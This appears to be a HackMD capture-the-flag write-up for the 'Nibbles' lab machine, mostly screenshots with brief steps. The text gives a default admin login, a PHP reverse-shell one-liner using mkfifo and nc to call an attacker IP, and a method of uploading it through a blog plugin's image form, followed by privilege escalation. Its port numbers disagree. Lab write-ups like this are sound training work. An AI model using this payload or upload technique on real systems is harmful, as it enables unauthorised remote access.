# Enumeration

![image](https://hackmd.io/_uploads/SkU1iP8Op.png)

# Web Footprinting

![image](https://hackmd.io/_uploads/rkksItLup.png)
![image](https://hackmd.io/_uploads/S1ZcZcUua.png)
![image](https://hackmd.io/_uploads/BytlbKUOp.png)
![image](https://hackmd.io/_uploads/r1vSlF8d6.png)
![image](https://hackmd.io/_uploads/Hk8uftUOT.png)
![image](https://hackmd.io/_uploads/H1zmXtL_p.png)

=> username : admin, password : nibbles

![image](https://hackmd.io/_uploads/rkhkG5Lda.png)
![image](https://hackmd.io/_uploads/S1EvB_8uT.png)

# Initial Foothold

### 1. Use Metasploit

![image](https://hackmd.io/_uploads/SJi4PY8Op.png)
![image](https://hackmd.io/_uploads/HJpvyqU_6.png)
![image](https://hackmd.io/_uploads/rkmCycL_6.png)
![image](https://hackmd.io/_uploads/ByCsuKLOT.png)

- local host => ifconfig => tun0 (VPN IP)

![image](https://hackmd.io/_uploads/rk6A5tIup.png)
![image](https://hackmd.io/_uploads/HyKzhFIOT.png)

- shell => Create shell
- `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal

![image](https://hackmd.io/_uploads/rk-P6F8da.png)

### 2. Use Reverse Shell

![image](https://hackmd.io/_uploads/BkOBQ98OT.png)
![image](https://hackmd.io/_uploads/rJjcTq8u6.png)

- Bash reverse shell one-liner (PHP script)
    - `<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.18 8433 >/tmp/f"); ?>`
        - 10.10.16.18 => Attacking IP
        - 8843 => Listening port

![image](https://hackmd.io/_uploads/rJyf49Uda.png)

- Start a netcat listener

![image](https://hackmd.io/_uploads/Sk-Ar9Uua.png)

=> username : admin, password : nibbles

![image](https://hackmd.io/_uploads/S1aew9I_6.png)

- Plugins => My images => Configure

![image](https://hackmd.io/_uploads/BJUnFc8u6.png)

- Choose File => image.php => Save changes

![image](https://hackmd.io/_uploads/BJC_O9Ldp.png)

- Check whether image.php was uploaded successfully

![image](https://hackmd.io/_uploads/SydViq8dp.png)

- Execute the reverse shell

![image](https://hackmd.io/_uploads/Bka8icLu6.png)

- Check the netcat listener

![image](https://hackmd.io/_uploads/S1Vr3cUd6.png)

- `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal

![image](https://hackmd.io/_uploads/BkPG6qIOT.png)

# Privilege Escalation

### 1. Use Metasploit

![image](https://hackmd.io/_uploads/B1XJGbPdp.png)
![image](https://hackmd.io/_uploads/HykEG-DuT.png)
![image](https://hackmd.io/_uploads/Hk82gbPO6.png)
![image](https://hackmd.io/_uploads/rk7HbZv_p.png)
![image](https://hackmd.io/_uploads/H1X77ZvOT.png)
![image](https://hackmd.io/_uploads/ryZsQ-P_6.png)

### 2. Use Reverse Shell

![image](https://hackmd.io/_uploads/B1tXKZPOa.png)
![image](https://hackmd.io/_uploads/SJJEiZv_p.png)
![image](https://hackmd.io/_uploads/rJMtj-POa.png)
![image](https://hackmd.io/_uploads/S1L5hWvOT.png)
![image](https://hackmd.io/_uploads/BJTah-vuT.png)
![image](https://hackmd.io/_uploads/SymVp-vd6.png)
![image](https://hackmd.io/_uploads/HJ59TZP_p.png)
![image](https://hackmd.io/_uploads/r10OAbwua.png)